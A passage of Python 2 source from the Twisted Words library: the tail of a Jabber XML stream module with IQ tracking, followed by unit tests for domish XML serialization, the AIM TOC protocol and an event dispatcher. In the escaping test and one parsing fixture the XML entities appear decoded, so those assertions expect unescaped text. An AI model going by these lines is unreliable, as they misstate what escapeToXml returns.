self.send('</stream:stream>')
def sendStreamError(self, streamError):
"""
Send stream level error.
If we are the receiving entity, and haven't sent the header yet,
we sent one first.
If the given C{failure} is a L{error.StreamError}, it is rendered
to its XML representation, otherwise a generic C{internal-error}
stream error is generated.
After sending the stream error, the stream is closed and the transport
connection dropped.
"""
if not self._headerSent and not self.initiating:
self.sendHeader()
if self._headerSent:
self.send(streamError.getElement())
self.sendFooter()
self.transport.loseConnection()
def send(self, obj):
"""
Send data over the stream.
This overrides L{xmlstream.Xmlstream.send} to use the default namespace
of the stream header when serializing L{domish.IElement}s. It is
assumed that if you pass an object that provides L{domish.IElement},
it represents a direct child of the stream's root element.
"""
if domish.IElement.providedBy(obj):
obj = obj.toXml(prefixes=self.prefixes,
defaultUri=self.namespace,
prefixesInScope=self.prefixes.values())
xmlstream.XmlStream.send(self, obj)
def connectionMade(self):
"""
Called when a connection is made.
Notifies the authenticator when a connection has been made.
"""
xmlstream.XmlStream.connectionMade(self)
self.authenticator.connectionMade()
def onDocumentStart(self, rootelem):
"""
Called when the stream header has been received.
Extracts the header's C{id} and C{version} attributes from the root
element. The C{id} attribute is stored in our C{sid} attribute and the
C{version} attribute is parsed and the minimum of the version we sent
and the parsed C{version} attribute is stored as a tuple (major, minor)
in this class' C{version} attribute. If no C{version} attribute was
present, we assume version 0.0.
If appropriate (we are the initiating stream and the minimum of our and
the other party's version is at least 1.0), a one-time observer is
registered for getting the stream features. The registered function is
C{onFeatures}.
Ultimately, the authenticator's C{streamStarted} method will be called.
@param rootelem: The root element.
@type rootelem: L{domish.Element}
"""
xmlstream.XmlStream.onDocumentStart(self, rootelem)
# Extract stream identifier
if rootelem.hasAttribute("id"):
self.sid = rootelem["id"]
# Extract stream version and take minimum with the version sent
if rootelem.hasAttribute("version"):
version = rootelem["version"].split(".")
try:
version = (int(version[0]), int(version[1]))
except IndexError, ValueError:
version = (0, 0)
else:
version = (0, 0)
self.version = min(self.version, version)
# Setup observer for stream errors
self.addOnetimeObserver("/error[@xmlns='%s']" % NS_STREAMS,
self.onStreamError)
# Setup observer for stream features, if applicable
if self.initiating and self.version >= (1, 0):
self.addOnetimeObserver('/features[@xmlns="%s"]' % NS_STREAMS,
self.onFeatures)
else:
self.authenticator.streamStarted()
class XmlStreamFactory(xmlstream.XmlStreamFactory):
def __init__(self, authenticator):
xmlstream.XmlStreamFactory.__init__(self)
self.authenticator = authenticator
def buildProtocol(self, _):
self.resetDelay()
# Create the stream and register all the bootstrap observers
xs = XmlStream(self.authenticator)
xs.factory = self
for event, fn in self.bootstraps: xs.addObserver(event, fn)
return xs
class TimeoutError(Exception):
"""
Exception raised when no IQ response has been received before the
configured timeout.
"""
def upgradeWithIQResponseTracker(xs):
"""
Enhances an XmlStream for iq response tracking.
This makes an L{XmlStream} object provide L{IIQResponseTracker}. When a
response is an error iq stanza, the deferred has its errback invoked with a
failure that holds a L{StanzaException<error.StanzaException>} that is
easier to examine.
"""
def callback(iq):
"""
Handle iq response by firing associated deferred.
"""
if getattr(iq, 'handled', False):
return
try:
d = xs.iqDeferreds[iq["id"]]
except KeyError:
pass
else:
del xs.iqDeferreds[iq["id"]]
iq.handled = True
if iq['type'] == 'error':
d.errback(error.exceptionFromStanza(iq))
else:
d.callback(iq)
def disconnected(_):
"""
Make sure deferreds do not linger on after disconnect.
This errbacks all deferreds of iq's for which no response has been
received with a L{ConnectionLost} failure. Otherwise, the deferreds
will never be fired.
"""
iqDeferreds = xs.iqDeferreds
xs.iqDeferreds = {}
for d in iqDeferreds.itervalues():
d.errback(ConnectionLost())
xs.iqDeferreds = {}
xs.iqDefaultTimeout = getattr(xs, 'iqDefaultTimeout', None)
xs.addObserver(xmlstream.STREAM_END_EVENT, disconnected)
xs.addObserver('/iq[@type="result"]', callback)
xs.addObserver('/iq[@type="error"]', callback)
directlyProvides(xs, ijabber.IIQResponseTracker)
class IQ(domish.Element):
"""
Wrapper for an iq stanza.
Iq stanzas are used for communications with a request-response behaviour.
Each iq request is associated with an XML stream and has its own unique id
to be able to track the response.
@ivar timeout: if set, a timeout period after which the deferred returned
by C{send} will have its errback called with a
L{TimeoutError} failure.
@type timeout: C{float}
"""
timeout = None
def __init__(self, xmlstream, type = "set"):
"""
@type xmlstream: L{xmlstream.XmlStream}
@param xmlstream: XmlStream to use for transmission of this IQ
@type type: L{str}
@param type: IQ type identifier ('get' or 'set')
"""
domish.Element.__init__(self, (None, "iq"))
self.addUniqueId()
self["type"] = type
self._xmlstream = xmlstream
def send(self, to=None):
"""
Send out this iq.
Returns a deferred that is fired when an iq response with the same id
is received. Result responses will be passed to the deferred callback.
Error responses will be transformed into a
L{StanzaError<error.StanzaError>} and result in the errback of the
deferred being invoked.
@rtype: L{defer.Deferred}
"""
if to is not None:
self["to"] = to
if not ijabber.IIQResponseTracker.providedBy(self._xmlstream):
upgradeWithIQResponseTracker(self._xmlstream)
d = defer.Deferred()
self._xmlstream.iqDeferreds[self['id']] = d
timeout = self.timeout or self._xmlstream.iqDefaultTimeout
if timeout is not None:
def onTimeout():
del self._xmlstream.iqDeferreds[self['id']]
d.errback(TimeoutError("IQ timed out"))
call = self._xmlstream._callLater(timeout, onTimeout)
def cancelTimeout(result):
if call.active():
call.cancel()
return result
d.addBoth(cancelTimeout)
self._xmlstream.send(self)
return d
```
#### File: words/test/test_domish.py
```python
from twisted.trial import unittest
from twisted.words.xish import domish
class DomishTestCase(unittest.TestCase):
def testEscaping(self):
s = "&<>'\""
self.assertEquals(domish.escapeToXml(s), "&<>'\"")
self.assertEquals(domish.escapeToXml(s, 1), "&<>'"")
def testNamespaceObject(self):
ns = domish.Namespace("testns")
self.assertEquals(ns.foo, ("testns", "foo"))
def testElementInit(self):
e = domish.Element((None, "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, None)
self.assertEquals(e.defaultUri, None)
self.assertEquals(e.parent, None)
e = domish.Element(("", "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "")
self.assertEquals(e.defaultUri, "")
self.assertEquals(e.parent, None)
e = domish.Element(("testns", "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "testns")
self.assertEquals(e.defaultUri, "testns")
self.assertEquals(e.parent, None)
e = domish.Element(("testns", "foo"), "test2ns")
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "testns")
self.assertEquals(e.defaultUri, "test2ns")
def testChildOps(self):
e = domish.Element(("testns", "foo"))
e.addContent("somecontent")
b2 = e.addElement(("testns2", "bar2"))
e["attrib1"] = "value1"
e[("testns2", "attrib2")] = "value2"
e.addElement("bar")
e.addElement("bar")
e.addContent("abc")
e.addContent("123")
# Check content merging
self.assertEquals(e.children[-1], "abc123")
# Check str()/content extraction
self.assertEquals(str(e), "somecontent")
# Check direct child accessor
self.assertEquals(e.bar2, b2)
e.bar2.addContent("subcontent")
e.bar2["bar2value"] = "somevalue"
# Check child ops
self.assertEquals(e.children[1], e.bar2)
self.assertEquals(e.children[2], e.bar)
# Check attribute ops
self.assertEquals(e["attrib1"], "value1")
del e["attrib1"]
self.assertEquals(e.hasAttribute("attrib1"), 0)
self.assertEquals(e.hasAttribute("attrib2"), 0)
self.assertEquals(e[("testns2", "attrib2")], "value2")
class DomishStreamTests:
def setUp(self):
self.doc_started = False
self.doc_ended = False
self.root = None
self.elements = []
self.stream = self.streamClass()
self.stream.DocumentStartEvent = self._docStarted
self.stream.ElementEvent = self.elements.append
self.stream.DocumentEndEvent = self._docEnded
def _docStarted(self, root):
self.root = root
self.doc_started = True
def _docEnded(self):
self.doc_ended = True
def doTest(self, xml):
self.stream.parse(xml)
def testHarness(self):
xml = "<root><child/><child2/></root>"
self.stream.parse(xml)
self.assertEquals(self.doc_started, True)
self.assertEquals(self.root.name, 'root')
self.assertEquals(self.elements[0].name, 'child')
self.assertEquals(self.elements[1].name, 'child2')
self.assertEquals(self.doc_ended, True)
def testBasic(self):
xml = "<stream:stream xmlns:stream='etherx' xmlns='jabber'>\n" + \
" <message to='bar'>" + \
" <x xmlns='xdelay'>some&data></x>" + \
" </message>" + \
"</stream:stream>"
self.stream.parse(xml)
self.assertEquals(self.root.name, 'stream')
self.assertEquals(self.root.uri, 'etherx')
self.assertEquals(self.elements[0].name, 'message')
self.assertEquals(self.elements[0].uri, 'jabber')
self.assertEquals(self.elements[0]['to'], 'bar')
self.assertEquals(self.elements[0].x.uri, 'xdelay')
self.assertEquals(unicode(self.elements[0].x), 'some&data>')
def testNoRootNS(self):
xml = "<stream><error xmlns='etherx'/></stream>"
self.stream.parse(xml)
self.assertEquals(self.root.uri, '')
self.assertEquals(self.elements[0].uri, 'etherx')
def testNoDefaultNS(self):
xml = "<stream:stream xmlns:stream='etherx'><error/></stream:stream>"""
self.stream.parse(xml)
self.assertEquals(self.root.uri, 'etherx')
self.assertEquals(self.root.defaultUri, '')
self.assertEquals(self.elements[0].uri, '')
self.assertEquals(self.elements[0].defaultUri, '')
def testChildDefaultNS(self):
xml = "<root xmlns='testns'><child/></root>"
self.stream.parse(xml)
self.assertEquals(self.root.uri, 'testns')
self.assertEquals(self.elements[0].uri, 'testns')
def testEmptyChildNS(self):
xml = "<root xmlns='testns'><child1><child2 xmlns=''/></child1></root>"
self.stream.parse(xml)
self.assertEquals(self.elements[0].child2.uri, '')
def testChildPrefix(self):
xml = "<root xmlns='testns' xmlns:foo='testns2'><foo:child/></root>"
self.stream.parse(xml)
self.assertEquals(self.root.localPrefixes['foo'], 'testns2')
self.assertEquals(self.elements[0].uri, 'testns2')
def testUnclosedElement(self):
self.assertRaises(domish.ParserError, self.stream.parse,
"<root><error></root>")
class DomishExpatStreamTestCase(unittest.TestCase, DomishStreamTests):
def setUp(self):
DomishStreamTests.setUp(self)
def setUpClass(self):
try:
import pyexpat
except ImportError:
raise unittest.SkipTest, "Skipping ExpatElementStream test, since no expat wrapper is available."
self.streamClass = domish.ExpatElementStream
class DomishSuxStreamTestCase(unittest.TestCase, DomishStreamTests):
def setUp(self):
DomishStreamTests.setUp(self)
def setUpClass(self):
if domish.SuxElementStream is None:
raise unittest.SkipTest, "Skipping SuxElementStream test, since twisted.web is not available."
self.streamClass = domish.SuxElementStream
class SerializerTests:
def testNoNamespace(self):
e = domish.Element((None, "foo"))
self.assertEquals(e.toXml(), "<foo/>")
self.assertEquals(e.toXml(closeElement = 0), "<foo>")
def testDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
self.assertEquals(e.toXml(), "<foo xmlns='testns'/>")
def testOtherNamespace(self):
e = domish.Element(("testns", "foo"), "testns2")
self.assertEquals(e.toXml({'testns': 'bar'}),
"<bar:foo xmlns:bar='testns' xmlns='testns2'/>")
def testChildDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement("bar")
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildSameNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement(("testns", "bar"))
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildSameDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement("bar", "testns")
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildOtherDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement(("testns2", "bar"), 'testns2')
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar xmlns='testns2'/></foo>")
def testOnlyChildDefaultNamespace(self):
e = domish.Element((None, "foo"))
e.addElement(("ns2", "bar"), 'ns2')
self.assertEquals(e.toXml(), "<foo><bar xmlns='ns2'/></foo>")
def testOnlyChildDefaultNamespace2(self):
e = domish.Element((None, "foo"))
e.addElement("bar")
self.assertEquals(e.toXml(), "<foo><bar/></foo>")
def testChildInDefaultNamespace(self):
e = domish.Element(("testns", "foo"), "testns2")
e.addElement(("testns2", "bar"))
self.assertEquals(e.toXml(), "<xn0:foo xmlns:xn0='testns' xmlns='testns2'><bar/></xn0:foo>")
def testQualifiedAttribute(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'/>")
def testQualifiedAttributeDefaultNS(self):
e = domish.Element(("testns", "foo"),
attribs = {("testns", "bar"): "baz"})
self.assertEquals(e.toXml(), "<foo xmlns='testns' xmlns:xn0='testns' xn0:bar='baz'/>")
def testTwoChilds(self):
e = domish.Element(('', "foo"))
child1 = e.addElement(("testns", "bar"), "testns2")
child1.addElement(('testns2', 'quux'))
child2 = e.addElement(("testns3", "baz"), "testns4")
child2.addElement(('testns', 'quux'))
self.assertEquals(e.toXml(), "<foo><xn0:bar xmlns:xn0='testns' xmlns='testns2'><quux/></xn0:bar><xn1:baz xmlns:xn1='testns3' xmlns='testns4'><xn0:quux xmlns:xn0='testns'/></xn1:baz></foo>")
def testXMLNamespace(self):
e = domish.Element((None, "foo"),
attribs = {("http://www.w3.org/XML/1998/namespace",
"lang"): "en_US"})
self.assertEquals(e.toXml(), "<foo xml:lang='en_US'/>")
def testQualifiedAttributeGivenListOfPrefixes(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
self.assertEquals(e.toXml({"testns2": "qux"}),
"<foo xmlns:qux='testns2' qux:bar='baz'/>")
def testNSPrefix(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
c = e.addElement(("testns2", "qux"))
c[("testns2", "bar")] = "quux"
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'><xn0:qux xn0:bar='quux'/></foo>")
def testDefaultNSPrefix(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
c = e.addElement(("testns2", "qux"))
c[("testns2", "bar")] = "quux"
c.addElement('foo')
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'><xn0:qux xn0:bar='quux'><xn0:foo/></xn0:qux></foo>")
def testPrefixScope(self):
e = domish.Element(('testns', 'foo'))
self.assertEquals(e.toXml(prefixes={'testns': 'bar'},
prefixesInScope=['bar']),
"<bar:foo/>")
def testLocalPrefixes(self):
e = domish.Element(('testns', 'foo'), localPrefixes={'bar': 'testns'})
self.assertEquals(e.toXml(), "<bar:foo xmlns:bar='testns'/>")
def testLocalPrefixesWithChild(self):
e = domish.Element(('testns', 'foo'), localPrefixes={'bar': 'testns'})
e.addElement('baz')
self.assertIdentical(e.baz.defaultUri, None)
self.assertEquals(e.toXml(), "<bar:foo xmlns:bar='testns'><baz/></bar:foo>")
def testRawXMLSerialization(self):
e = domish.Element((None, "foo"))
e.addRawXml("<abc123>")
# The testcase below should NOT generate valid XML -- that's
# the whole point of using the raw XML call -- it's the callers
# responsiblity to ensure that the data inserted is valid
self.assertEquals(e.toXml(), "<foo><abc123></foo>")
def testRawXMLWithUnicodeSerialization(self):
e = domish.Element((None, "foo"))
e.addRawXml(u"<degree>\u00B0</degree>")
self.assertEquals(e.toXml(), u"<foo><degree>\u00B0</degree></foo>")
def testUnicodeSerialization(self):
e = domish.Element((None, "foo"))
e["test"] = u"my value\u0221e"
e.addContent(u"A degree symbol...\u00B0")
self.assertEquals(e.toXml(),
u"<foo test='my value\u0221e'>A degree symbol...\u00B0</foo>")
class DomishTestListSerializer(unittest.TestCase, SerializerTests):
def setUpClass(self):
self.__serializerClass = domish.SerializerClass
domish.SerializerClass = domish._ListSerializer
def tearDownClass(self):
domish.SerializerClass = self.__serializerClass
```
#### File: words/test/test_toc.py
```python
from twisted.trial import unittest
from twisted.words.protocols import toc
from twisted.internet import protocol, main
from twisted.python import failure
import StringIO
from struct import pack,unpack
class StringIOWithoutClosing(StringIO.StringIO):
def close(self):
pass
class DummyTOC(toc.TOC):
"""
used to override authentication, now overrides printing.
"""
def _debug(self,data):
pass
SEQID=1001
def flap(type,data):
global SEQID
send="*"
send=send+pack("!BHH",type,SEQID,len(data))
send=send+data
SEQID=SEQID+1
return send
def readFlap(data):
if data=="": return [None,""]
null,type,seqid,length=unpack("!BBHH",data[:6])
val=data[6:6+length]
return [[type,val],data[6+length:]]
class TOCGeneralTestCase(unittest.TestCase):
"""
general testing of TOC functions.
"""
def testTOC(self):
self.runTest()
def runTest(self):
USERS=2
data=range(USERS)
data[0]=("FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_add_buddy test\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_send_im test \"hi\"\000"),\
flap(2,"toc_send_im test2 \"hello\"\000"),\
flap(2,"toc_set_away \"not here\"\000"),\
flap(2,"toc_set_idle 602\000"),\
flap(2,"toc_set_idle 0\000"),\
flap(2,"toc_set_away\000"),\
flap(2,"toc_evil test norm\000"),\
flap(2,"toc_chat_join 4 \"Test Chat\"\000"),\
flap(2,"toc_chat_send 0 \"hello\"\000"),\
#flap(2,"toc_chat_leave 0\000")) #,\
flap(2,"toc_chat_invite 0 \"come\" ooga\000"),\
#flap(2,"toc_chat_accept 0\000"),\
flap(5,"\000"),\
flap(2,"toc_chat_whisper 0 ooga \"boo ga\"\000"),\
flap(2,"toc_chat_leave 0"),\
flap(5,"\000"))
data[1]=("FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004ooga"),\
flap(2,"toc_signon localhost 9999 ooga 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_add_buddy test\000"),\
flap(2,"toc_init_done\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
#flap(5,"\000"),\
#flap(5,"\000"),\
#flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
#flap(5,"\000"),\
flap(2,"toc_chat_accept 0\000"),\
flap(2,"toc_chat_send 0 \"hi test\"\000"),\
flap(5,"\000"),\
flap(2,"toc_chat_leave 0\000"))
strings=range(USERS)
for i in strings:
strings[i]=StringIOWithoutClosing()
fac=toc.TOCFactory()
dummy=range(USERS)
for i in dummy:
dummy[i]=DummyTOC()
dummy[i].factory=fac
dummy[i].makeConnection(protocol.FileWrapper(strings[i]))
while reduce(lambda x,y:x+y,map(lambda x:x==(),data))!=USERS:
for i in range(USERS):
d=data[i]
if len(d)>0:
k,data[i]=d[0],d[1:]
for j in k:
dummy[i].dataReceived(j) # test by doing a character at a time
else:
dummy[i].connectionLost(failure.Failure(main.CONNECTION_DONE))
values=range(USERS)
for i in values:
values[i]=strings[i].getvalue()
flaps=map(lambda x:[],range(USERS))
for value in values:
i=values.index(value)
f,value=readFlap(value)
while f:
flaps[i].append(f)
f,value=readFlap(value)
ts=range(USERS)
for t in ts:
ts[t]=dummy[t].signontime
shouldequal=range(USERS)
shouldequal[0]=[ \
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\00"],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"IM_IN:test:F:hi\000"],\
[2,"ERROR:901:test2\000"],\
#[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:10: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"EVILED:10:test\000"],\
[2,"UPDATE_BUDDY:test:T:10:%s:0: O\000"%ts[0]],\
[2,"CHAT_JOIN:0:Test Chat\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:test\000"],\
[2,"CHAT_IN:0:test:F:hello\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:ooga\000"],\
[2,"CHAT_IN:0:ooga:F:hi test\000"],\
[2,"CHAT_LEFT:0\000"]]
shouldequal[1]=[ \
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:ooga\000"],\
[2,"CONFIG:\000"],\
#[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:10: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:10:%s:0: O\000"%ts[0]],\
[2,"CHAT_INVITE:Test Chat:0:test:come\000"],\
[2,"CHAT_JOIN:0:Test Chat\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:test:ooga\000"],\
[2,"CHAT_IN:0:ooga:F:hi test\000"],\
[2,"CHAT_IN:0:test:T:boo ga\000"],\
[2,"CHAT_UPDATE_BUDDY:0:F:test\000"],\
[2,"CHAT_LEFT:0\000"]]
if flaps!=shouldequal:
for i in range(len(shouldequal)):
for j in range(len(shouldequal[i])):
if shouldequal[i][j]!=flaps[i][j]:
raise AssertionError("GeneralTest Failed!\nUser %s Line %s\nactual:%s\nshould be:%s"%(i,j,flaps[i][j],shouldequal[i][j]))
raise AssertionError("GeneralTest Failed with incorrect lengths!")
class TOCMultiPacketTestCase(unittest.TestCase):
"""
i saw this problem when using GAIM. It only read the flaps onces per dataReceived, and would basically block if it ever received two packets together in one dataReceived. this tests for that occurance.
"""
def testTOC(self):
self.runTest()
def runTest(self):
packets=["FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon null 9999 test 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_send_im test hi\000")]
shouldbe=[[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"IM_IN:test:F:hi\000"]]
data=""
for i in packets:
data=data+i
s=StringIOWithoutClosing()
d=DummyTOC()
fac=toc.TOCFactory()
d.factory=fac
d.makeConnection(protocol.FileWrapper(s))
d.dataReceived(data)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
value=s.getvalue()
flaps=[]
f,value=readFlap(value)
while f:
flaps.append(f)
f,value=readFlap(value)
if flaps!=shouldbe:
for i in range(len(flaps)):
if flaps[i]!=shouldbe[i]:raise AssertionError("MultiPacketTest Failed!\nactual:%s\nshould be:%s"%(flaps[i],shouldbe[i]))
raise AssertionError("MultiPacketTest Failed with incorrect length!, printing both lists\nactual:%s\nshould be:%s"%(flaps,shouldbe))
class TOCSavedValuesTestCase(unittest.TestCase):
def testTOC(self):
self.runTest()
def runTest(self):
password1=toc.roast("test pass")
password2=toc.roast("<PASSWORD>")
beforesend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test %s english \"penguin 0.1\"\000"%password1),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_set_config \"{m 4}\"\000"),\
flap(2,"toc_format_nickname BOOGA\000"),\
flap(2,"toc_format_nickname \"T E S T\"\000"),\
flap(2,"toc_change_passwd \"testpass\" \"pass test\"\000"),\
flap(2,"toc_change_passwd \"test pass\" \"pass test\"\000")]
beforeexpect=[\
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"ERROR:911\000"],\
[2,"ADMIN_NICK_STATUS:0\000"],\
[2,"ERROR:911\000"],\
[2,"ADMIN_PASSWD_STATUS:0\000"]]
badpasssend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x1000 english \"penguin 0.1\"\000"),\
flap(2,"toc_init_done")]
badpassexpect=[\
[1,"\000\00\000\001"],\
[2,"ERROR:980\000"]]
goodpasssend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test %s english \"penguin 0.1\"\000"%password2),\
flap(2,"toc_init_done")]
goodpassexpect=[\
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:T E S T\000"],\
[2,"CONFIG:{m 4}\000"]]
fac=toc.TOCFactory()
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in beforesend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=beforeexpect:
for i in range(len(flaps)):
if flaps[i]!=beforeexpect[i]:
raise AssertionError("SavedValuesTest Before Failed!\nactual:%s\nshould be:%s"%(flaps[i],beforeexpect[i]))
raise AssertionError("SavedValuesTest Before Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,beforeexpect))
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in badpasssend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=badpassexpect:
for i in range(len(flaps)):
if flaps[i]!=badpassexpect[i]:
raise AssertionError("SavedValuesTest BadPass Failed!\nactual:%s\nshould be:%s"%(flaps[i],badpassexpect[i]))
raise AssertionError("SavedValuesTest BadPass Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,badpassexpect))
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in goodpasssend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=goodpassexpect:
for i in range(len(flaps)):
if flaps[i]!=goodpassexpect[i]:
raise AssertionError("SavedValuesTest GoodPass Failed!\nactual:%s\nshould be:%s"%(flaps[i],goodpassexpect[i]))
raise AssertionError("SavedValuesTest GoodPass Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,beforeexpect))
class TOCPrivacyTestCase(unittest.TestCase):
def runTest(self):
sends=["FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x00 english penguin\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_add_deny\000"),\
flap(2,"toc_send_im test 1\000"),\
flap(2,"toc_add_deny test\000"),\
flap(2,"toc_send_im test 2\000"),\
flap(2,"toc_add_permit\000"),\
flap(2,"toc_send_im test 3\000"),\
flap(2,"toc_add_permit test\000"),\
flap(2,"toc_send_im test 4\000")]
expect=[[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"IM_IN:test:F:1\000"],\
[2,"ERROR:901:test\000"],\
[2,"ERROR:901:test\000"],\
[2,"IM_IN:test:F:4\000"]]
d=DummyTOC()
d.factory=toc.TOCFactory()
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in sends:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=expect:
for i in range(len(flaps)):
if flaps[i]!=expect[i]:
raise AssertionError("PrivacyTest Before Failed!\nactual:%s\nshould be:%s"%(flaps[i],expect[i]))
raise AssertionError("PrivacyTest Before Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,expect))
testCases=[TOCGeneralTestCase,TOCMultiPacketTestCase,TOCSavedValuesTestCase,TOCPrivacyTestCase]
```
#### File: words/test/test_xishutil.py
```python
import sys, os
from twisted.trial import unittest
from twisted.words.xish.domish import Element
from twisted.words.xish.utility import EventDispatcher
class CallbackTracker:
def __init__(self):
self.called = 0
self.object = None
def call(self, object):
self.called = self.called + 1
self.object = object
class CallbackTracker2 (CallbackTracker):
def __init__(self, dispatcher):
CallbackTracker.__init__(self)
self.dispatcher = dispatcher
def call2(self, _):
self.dispatcher.addObserver("/presence", self.call)
class OrderedCallbackTracker:
def __init__(self):
self.callList = []
def call1(self, object):
self.callList.append(self.call1)
def call2(self, object):
self.callList.append(self.call2)
def call3(self, object):
self.callList.append(self.call3)
class EventDispatcherTest(unittest.TestCase):
def testStuff(self):
d = EventDispatcher()
cb1 = CallbackTracker()
cb2 = CallbackTracker()
cb3 = CallbackTracker()
d.addObserver("/message/body", cb1.call)
d.addObserver("/message", cb1.call)
d.addObserver("/presence", cb2.call)
d.addObserver("//event/testevent", cb3.call)
msg = Element(("ns", "message"))
msg.addElement("body")
pres = Element(("ns", "presence"))
pres.addElement("presence")
d.dispatch(msg)
self.assertEquals(cb1.called, 2)
self.assertEquals(cb1.object, msg)
self.assertEquals(cb2.called, 0)
d.dispatch(pres)
self.assertEquals(cb1.called, 2)
self.assertEquals(cb2.called, 1)
self.assertEquals(cb2.object, pres)
self.assertEquals(cb3.called, 0)
d.dispatch(d, "//event/testevent")
self.assertEquals(cb3.called, 1)
self.assertEquals(cb3.object, d)
d.removeObserver("/presence", cb2.call)
d.dispatch(pres)
self.assertEquals(cb2.called, 1)
def testAddObserverInDispatch(self):
# Test for registration of events during dispatch
d = EventDispatcher()
msg = Element(("ns", "message"))
pres = Element(("ns", "presence"))
